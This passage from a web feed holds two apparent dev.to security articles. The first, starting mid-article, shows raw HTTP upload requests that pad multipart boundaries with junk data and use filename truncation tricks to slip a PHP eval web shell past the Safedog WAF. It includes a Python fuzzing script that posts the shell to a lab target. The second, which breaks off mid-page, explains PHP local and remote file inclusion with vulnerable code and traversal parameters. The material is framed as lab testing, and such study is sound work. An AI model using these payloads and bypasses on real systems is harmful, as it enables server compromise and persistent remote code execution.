</p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">/Pass-01/index.php</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">hackrock.com:813</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9</span> <span class="na">Connection</span><span class="p">:</span> <span class="s">close</span> ------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9 Content-Disposition: form-data; name="upload_file";filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['x']);?&gt; ------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9 Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9-- </code></pre> </div> <h3> Inserting Junk Data at the End of the Boundary </h3> <p>As mentioned previously, arbitrary data may be appended to the end of the <code>boundary</code> string; thus, a large volume of junk data can be added there.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">/Pass-01/index.php</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">hackrock.com:813</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf,bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9</span> <span class="na">Connection</span><span class="p">:</span> <span class="s">close</span> <span class="na">Content-Length</span><span class="p">:</span> <span class="s">592</span> ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['x']);?&gt; ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryzEHC1GyG8wYOH1rf-- </code></pre> </div> <h3> Inserting Junk Data Between multipart/form-data and boundary </h3> <p>Since it is possible to insert any data between <code>multipart/form-data</code> and <code>boundary</code>, a large volume of junk data can be placed there.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">/Pass-01/index.php</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">hackrock.com:813</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8659f2312bf8658dafbf0fd31ead48dcc0b9f2312bfWebKitFormBoundaryzEHC1GyG8wYOH1rffbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf</span> <span class="na">Connection</span><span class="p">:</span> <span class="s">close</span> <span class="na">Content-Length</span><span class="p">:</span> <span class="s">319</span> ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['x']);?&gt; ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryzEHC1GyG8wYOH1rf-- </code></pre> </div> <h2> Data Truncation </h2> <h3> Carriage Return and Line Feed Truncation </h3> <p>POST request header values (not the header lines themselves) may contain line breaks, provided there are no blank lines. If the WAF stops matching the file name at a line break, a bypass can occur.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: for m-data; name="upload_ file"; fi le name="sh ell.p h p" </code></pre> </div> <h3> Semicolon Truncation </h3> <p>If the WAF truncates the file name at a semicolon, a bypass can be achieved.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="upload_file"; filename="shell.jpg;.php" </code></pre> </div> <h3> Quotation Mark Truncation </h3> <p>PHP versions prior to 5.3 exhibit single/double quote truncation behaviour.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="upload_file"; filename="shell.jpg'.php" Content-Disposition: form-data; name="upload_file"; filename="shell.jpg".php" </code></pre> </div> <h3> Null Byte Truncation </h3> <p>In a URL, <code>%00</code> represents the ASCII null character (0x00), which is reserved as a special character; when encountered, reading is terminated. Here <code>[0x00]</code> denotes the hexadecimal null byte.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="upload_file"; filename="shell.php[0x00].jpg" </code></pre> </div> <h2> Practical Demonstration – Bypassing Safedog File Upload Protection </h2> <p><strong>Experimental Environment</strong></p> <ul> <li>Target: Upload-Labs (Pass‑1)</li> <li>Database: MySQL 5.5</li> <li>Web script: PHP 5.4.19</li> <li>WAF: Safedog for Apache v4.0.3025</li> </ul> <blockquote> <p>During testing, only the upload protection module of Safedog was enabled; otherwise, other modules could delete files from the target environment due to false positives.</p> </blockquote> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwrwjckbl4253ov183s3l.png" alt=" " width="800" height="533"></a></p> <h3> Practical Case 1 – Writing a Fuzzing Script to Exploit Data Overflow </h3> <p>Given that the boundary string can accommodate a large volume of junk data, a fuzzing script was written to test whether the WAF could be bypassed.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1">#! /usr/bin/env python # _*_ coding:utf-8 _*_ </span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">random</span> <span class="n">url</span><span class="o">=</span><span class="sh">"</span><span class="s">http://hackrock.com:813/Pass-01/index.php</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">generate_random_str</span><span class="p">(</span><span class="n">randomlength</span><span class="o">=</span><span class="mi">16</span><span class="p">):</span> <span class="n">random_str</span> <span class="o">=</span> <span class="sh">''</span> <span class="n">base_str</span> <span class="o">=</span> <span class="sh">'</span><span class="s">ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789</span><span class="sh">'</span> <span class="n">length</span> <span class="o">=</span> <span class="nf">len</span><span class="p">(</span><span class="n">base_str</span><span class="p">)</span> <span class="o">-</span> <span class="mi">1</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="n">randomlength</span><span class="p">):</span> <span class="n">random_str</span> <span class="o">+=</span> <span class="n">base_str</span><span class="p">[</span><span class="n">random</span><span class="p">.</span><span class="nf">randint</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">length</span><span class="p">)]</span> <span class="k">return</span> <span class="n">random_str</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span><span class="mi">8000</span><span class="p">,</span><span class="mi">50</span><span class="p">):</span> <span class="n">stri</span> <span class="o">=</span> <span class="nf">generate_random_str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">headers</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">Host</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">hackrock.com:813</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">User-Agent</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Referer</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">http://hackrock.com:813/Pass-01/index.php</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Content-Type</span><span class="sh">"</span><span class="p">:</span><span class="sh">"</span><span class="s">multipart/form-data; boundary=----</span><span class="sh">"</span> <span class="o">+</span> <span class="n">stri</span> <span class="p">}</span> <span class="n">payload</span> <span class="o">=</span> <span class="sh">"""</span><span class="s"> ------</span><span class="sh">"""</span> <span class="o">+</span> <span class="n">stri</span> <span class="o">+</span> <span class="sh">"""</span><span class="s"> Content-Disposition: form-data; name=</span><span class="sh">"</span><span class="s">upload_file</span><span class="sh">"</span><span class="s">; filename=</span><span class="sh">"</span><span class="s">shell.php</span><span class="sh">"</span><span class="s"> Content-Type: image/png &lt;?php @eval($_POST[</span><span class="sh">'</span><span class="s">hack</span><span class="sh">'</span><span class="s">]); ?&gt; ------</span><span class="sh">"""</span> <span class="o">+</span> <span class="n">stri</span> <span class="o">+</span> <span class="sh">"""</span><span class="s"> Content-Disposition: form-data; name=</span><span class="sh">"</span><span class="s">submit</span><span class="sh">"</span><span class="s"> 上传 ------</span><span class="sh">"""</span> <span class="o">+</span> <span class="n">stri</span> <span class="o">+</span> <span class="sh">"""</span><span class="s">-- </span><span class="sh">"""</span> <span class="n">response</span><span class="o">=</span><span class="n">requests</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="n">url</span><span class="o">=</span><span class="n">url</span><span class="p">,</span><span class="n">headers</span><span class="o">=</span><span class="n">headers</span><span class="p">,</span><span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">,</span><span class="n">timeout</span><span class="o">=</span><span class="mf">0.5</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">content</span> <span class="k">print</span> <span class="n">result</span> <span class="k">print</span> <span class="n">stri</span> <span class="k">print</span> <span class="sh">"</span><span class="se">\n</span><span class="sh">"</span> <span class="c1">#print payload </span> <span class="c1">#print headers </span> <span class="k">if</span> <span class="n">result</span><span class="p">.</span><span class="nf">count</span><span class="p">(</span><span class="sh">'</span><span class="s">上传</span><span class="sh">'</span><span class="p">):</span> <span class="k">print</span> <span class="sh">"</span><span class="s">Length is : %s </span><span class="sh">"</span> <span class="o">%</span> <span class="nf">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span> <span class="k">break</span> <span class="k">except</span><span class="p">:</span> <span class="k">print</span> <span class="sh">"</span><span class="s">.</span><span class="sh">"</span> </code></pre> </div> <p>The script was written using Python 2.7; ensure a Python 2 environment and the required libraries are installed.</p> <p>The test result indicated that a boundary length of 3710 characters was effective:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjvutvjl25sixaks9ci0f.png" alt=" " width="799" height="376"></a></p> <p>Although the file was not actually uploaded to the server (due to the target environment’s restriction), the Safedog WAF was successfully bypassed.</p> <p>The crafted packet was then sent via Burp Suite:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzag2rdb4ew9mcf3rkfx7.png" alt=" " width="800" height="418"></a></p> <p>The bypass was achieved.</p> <h3> Practical Case 2 – Bypassing Using Null Byte Truncation </h3> <p>The file was uploaded while intercepting with Burp Suite, and the <code>filename</code> value was changed to: <code>shell.php;.jpg</code></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9wh8n3buawxi169el5yz.png" alt=" " width="797" height="90"></a></p> <p>The hex view was then opened (the semicolon’s hexadecimal value is <code>0x3b</code>), and <code>3b</code> was altered to <code>00</code>:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwnorizf464pzhszhla8q.png" alt=" " width="800" height="517"></a></p> <p>The packet was sent.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fse88tmugeopton4xrf5d.png" alt=" " width="799" height="373"></a></p> <p>The bypass was successful.</p> firewall cybersecurity vulnerabilities waf Different ways to get a shell using PHP file inclusion vulnerabilities Excalibra Mon, 08 Jun 2026 01:16:52 +0000 https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2 https://dev.to/excalibra/different-ways-to-get-a-shell-using-php-file-inclusion-vulnerabilities-11n2 <h2> Related Functions </h2> <p>The following four functions in PHP are typically responsible for file inclusion vulnerabilities:</p> <ol> <li><a href="http://www.php.net/manual/en/function.include.php" rel="noopener noreferrer"><code>include()</code></a></li> <li><a href="http://php.net/manual/en/function.include-once.php" rel="noopener noreferrer"><code>include_once()</code></a></li> <li><a href="http://php.net/manual/en/function.require.php" rel="noopener noreferrer"><code>require()</code></a></li> <li><a href="http://php.net/manual/en/function.require-once.php" rel="noopener noreferrer"><code>require_once()</code></a></li> </ol> <p>If an error occurs during inclusion with <code>require()</code> (e.g., the file does not exist), execution will halt immediately, and subsequent statements will not be executed.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fod3vli5550j5aw03mm7z.png" alt=" " width="800" height="188"></a></p> <p>If an error occurs with <code>include()</code>, only a warning is issued, and execution continues with subsequent statements.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjak8aggh7a5itydqcs04.png" alt=" " width="799" height="200"></a></p> <p><code>require_once()</code> and <code>include_once()</code> behave similarly to <code>require()</code> and <code>include()</code>, respectively. If a file has already been included, <code>require_once()</code> and <code>include_once()</code> will not include it again, thereby avoiding issues such as function redefinition or variable reassignment.</p> <p>When these four functions are used to include files, regardless of the file type (e.g., image, text file), the file is parsed directly as PHP. Test code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="cp">&lt;?php</span> <span class="nv">$file</span> <span class="o">=</span> <span class="nv">$_GET</span><span class="p">[</span><span class="s1">'file'</span><span class="p">];</span> <span class="k">include</span> <span class="nv">$file</span><span class="p">;</span> <span class="cp">?&gt;</span> </code></pre> </div> <p>In the same directory, there is a file named <code>phpinfo.txt</code> with the following content: <code>&lt;?php phpinfo(); ?&gt;</code>. Simply visit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>fileinclude.php?file<span class="o">=</span>phpinfo.txt </code></pre> </div> <p>This will successfully execute <code>phpinfo()</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg64mvr1un3k0uj65jhdh.png" alt=" " width="800" height="192"></a></p> <h3> Scenario </h3> <ol> <li>The application uses one of the relevant file inclusion functions.</li> <li>The file inclusion function uses a dynamic variable, e.g., <code>include $file;</code>.</li> <li>An attacker can control that variable, e.g., <code>$file = $_GET['file'];</code>.</li> </ol> <h3> Classification </h3> <h4> LFI (Local File Inclusion) </h4> <p>Local File Inclusion (LFI) refers to vulnerabilities that allow an attacker to include and execute local files. In most cases, encountered file inclusion vulnerabilities are LFI.</p> <p>This type of vulnerability is not affected by the <code>allow_url_fopen</code> or <code>allow_url_include</code> settings. For example, setting both to <code>Off</code> in <code>php.ini</code> and restarting the server:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"></a></p> <p>Visiting <code>?page=../../../phpinfo.php</code> still successfully parses <code>phpinfo()</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff6diwtlt5s815vlhztg1.png" alt=" " width="800" height="224"></a></p> <h4> RFI (Remote File Inclusion) </h4> <p>Remote File Inclusion (RFI) allows an attacker to include and execute files from a remote server. Since the remote file is under the attacker's control, this vulnerability can be extremely harmful. However, RFI has stricter prerequisites, requiring the following <code>php.ini</code> configurations:</p> <ol> <li><code>allow_url_fopen = On</code></li> <li><code>allow_url_include = On</code></li> </ol> <p>Both must be <code>On</code> for remote file inclusion to succeed. For example, setting both to <code>Off</code> and restarting the server:</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2aah6dkonifxu4qiypgn.png" alt=" " width="800" height="215"></a></p> <p>Visiting <code>?page=http://192.168.1.4</code> will produce errors:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code> <span class="nc">Warning</span><span class="o">:</span> <span class="k">include</span><span class="p">()</span><span class="o">:</span> <span class="n">http</span><span class="o">://</span> <span class="n">wrapper</span> <span class="n">is</span> <span class="n">disabled</span> <span class="n">in</span> <span class="n">the</span> <span class="n">server</span> <span class="n">configuration</span> <span class="n">by</span> <span class="n">allow_url_fopen</span><span class="o">=</span><span class="mi">0</span> <span class="n">in</span> <span class="nc">D</span><span class="o">:</span><span class="n">\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index</span><span class="mf">.</span><span class="n">php</span> <span class="n">on</span> <span class="n">line</span> <span class="mi">36</span> <span class="nc">Warning</span><span class="o">:</span> <span class="k">include</span><span class="p">(</span><span class="n">http</span><span class="o">://</span><span class="mf">192.168.1.4</span><span class="p">)</span><span class="o">:</span> <span class="n">failed</span> <span class="n">to</span> <span class="n">open</span> <span class="n">stream</span><span class="o">:</span> <span class="n">no</span> <span class="n">suitable</span> <span class="n">wrapper</span> <span class="n">could</span> <span class="n">be</span> <span class="n">found</span> <span class="n">in</span> <span class="nc">D</span><span class="o">:</span><span class="n">\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index</span><span class="mf">.</span><span class="n">php</span> <span class="n">on</span> <span class="n">line</span> <span class="mi">36</span> <span class="nc">Warning</span><span class="o">:</span> <span class="k">include</span><span class="p">()</span><span class="o">:</span> <span class="nc">Failed</span> <span class="n">opening</span> <span class="s1">'http://192.168.1.4'</span> <span class="k">for</span> <span class="nf">inclusion</span> <span class="p">(</span><span class="n">include_path</span><span class="o">=</span><span class="s1">'.;C:\php\pear;../../external/phpids/0.6/lib/'</span><span class="p">)</span> <span class="n">in</span> <span class="nc">D</span><span class="o">:</span><span class="n">\phpStudy\PHPTutorial\WWW\DVWA\vulnerabilities\fi\index</span><span class="mf">.</span><span class="n">php</span> <span class="n">on</span> <span class="n">line</span> <span class="mi">36</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmyzjntin2u8ktiu0j9e0.png" alt=" " width="799" height="251"></a></p> <p>After setting both configuration options back to <code>On</code> and restarting the server, remote file inclusion works.</p> <p><a 